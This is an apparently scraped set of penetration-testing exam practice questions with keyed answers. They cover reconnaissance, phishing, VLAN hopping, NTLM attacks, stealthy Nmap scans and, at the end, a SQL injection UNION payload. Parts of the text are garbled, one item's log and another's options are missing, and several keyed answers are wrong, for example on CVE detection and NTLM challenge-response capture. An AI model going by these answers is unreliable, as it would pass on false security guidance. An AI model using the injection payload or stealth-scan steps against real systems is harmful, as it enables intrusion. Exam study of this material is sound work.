A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action? (A). ROE (B). SLA (C). MSA (D). NDA
(D). NDA
During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout? (A). Mask (B). Rainbow (C). Dictionary (D). Password spraying
(D). Password spraying
A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective? (A). Gain access to the target host and implant malware specially crafted for this purpose. (B). Exploit the local DNS server and add/update the zone records with a spoofed A record. (C). Use the Scapy utility to overwrite name resolution fields in the DNS query response. (D). Proxy HTTP connections from the target host to that of the spoofed host.
(D). Proxy HTTP connections from the target host to that of the spoofed host.
A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results? (A). Specially craft and deploy phishing emails to key company leaders. (B). Run a vulnerability scan against the company's external website. (C). Runtime the company's vendor/supply chain. (D). Scrape web presences and social-networking sites.
(D). Scrape web presences and social-networking sites.
During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT? (A). Badge cloning (B). Watering-hole attack (C). Impersonation (D). Spear phishing
(D). Spear phishing Spear phishing is a type of targeted attack where the attacker sends emails that appear to come from a legitimate source, often a company or someone familiar to the target, with the goal of tricking the target into clicking on a malicious link or providing sensitive information. In this case, the penetration tester has already gathered OSINT on the IT system administrator, so they can use this information to craft a highly targeted spear phishing attack to try and gain access to the target system.
A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log: Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets? (A). Run an application vulnerability scan and then identify the TCP ports used by the application. (B). Run the application attached to a debugger and then review the application's log. (C). Disassemble the binary code and then identify the break points. (D). Start a packet capture with Wireshark and then run the application.
(D). Start a packet capture with Wireshark and then run the application.
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal? (A). RFID cloning (B). RFID tagging (C). Meta tagging (D). Tag nesting
(D). Tag nesting since vlan hopping requires 2 vlans to be nested in a single packet. Double tagging occurs when an attacker adds and modifies tags on an Ethernet frame to allow the sending of packets through any VLAN. This attack takes advantage of how many switches process tags. Most switches will only remove the outer tag and forward the frame to all native VLAN ports. With that said, this exploit is only successful if the attacker belongs to the native VLAN of the trunk link.
A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server. Which of the following is the MOST likely reason for the error? (A). TCP port 443 is not open on the firewall (B). The API server is using SSL instead of TLS (C). The tester is using an outdated version of the application (D). The application has the API certificate pinned.
(D). The application has the API certificate pinned.
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment? (A). A signed statement of work (B). The correct user accounts and associated passwords (C). The expected time frame of the assessment (D). The proper emergency contacts for the client
(D). The proper emergency contacts for the client
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server? (A). Perform vertical privilege escalation. (B). Replay the captured traffic to the server to recreate the session. (C). Use John the Ripper to crack the password. (D). Utilize a pass-the-hash attack.
(D). Utilize a pass-the-hash attack.
Performing a penetration test against an environment with SCADA devices brings additional safety risk because the: (A). devices produce more heat and consume more power. (B). devices are obsolete and are no longer available for replacement. (C). protocols are more difficult to understand. (D). devices may cause physical world effects.
(D). devices may cause physical world effects. "A significant issue identified by Wiberg is that using active network scanners, such as Nmap, presents a weakness when attempting port recognition or service detection on SCADA devices. Wiberg states that active tools such as Nmap can use unusual TCP segment data to try and find available ports. Furthermore, they can open a massive amount of connections with a specific SCADA device but then fail to close them gracefully." And since SCADA and ICS devices are designed and implemented with little attention having been paid to the operational security of these devices and their ability to handle errors or unexpected events, the presence idle open connections may result into errors that cannot be handled by the devices.
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the following Nmap scan syntaxes would BEST accomplish this objective? (A). nmap -sT -vvv -O 192.168.1.2/24 -PO (B). nmap -sV 192.168.1.2/24 -PO (C). nmap -sA -v -O 192.168.1.2/24 (D). nmap -sS -O 192.168.1.2/24 -T1
(D). nmap -sS -O 192.168.1.2/24 -T1
When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal? (A). <# (B). <$ (C). ## (D). #$ (E). #!
(E). #!
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware? (A). Analyze the malware to see what it does. (B). Collect the proper evidence and then remove the malware. (C). Do a root-cause analysis to find out how the malware got in. (D). Remove the malware immediately. (E). Stop the assessment and inform the emergency contact.
(E). Stop the assessment and inform the emergency contact.
A penetration tester discovers a critical vulnerability is being actively exploited by attackers. Which of the following should the tester do NEXT? A - Reach our to the primary point of contact B - Try to take down the attackers C - call law enforcement officials immediately D - Collect the proper evidence and add to the final report
A - Reach our to the primary point of contact
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task? A - Run Nmap with the -o, -p22, and -sC options set against the target B - Run nmap with the -sV and -p22 options set against the target C - run nmap with the --script vulners option set against the target D - run nmap with the -sA options set against the target
A - Run Nmap with the -o, -p22, and -sC options set against the target
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.) (A). Open-source research (B). A ping sweep (C). Traffic sniffing (D). Port knocking (E). A vulnerability scan (F). An Nmap scan
A). Open-source research (C). Traffic sniffing
A tester who is performing a penetration test on a website receives the following output: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62 Which of the following commands can be used to further attack the website?
D). 1 UNION SELECT 1, DATABASE(),3--
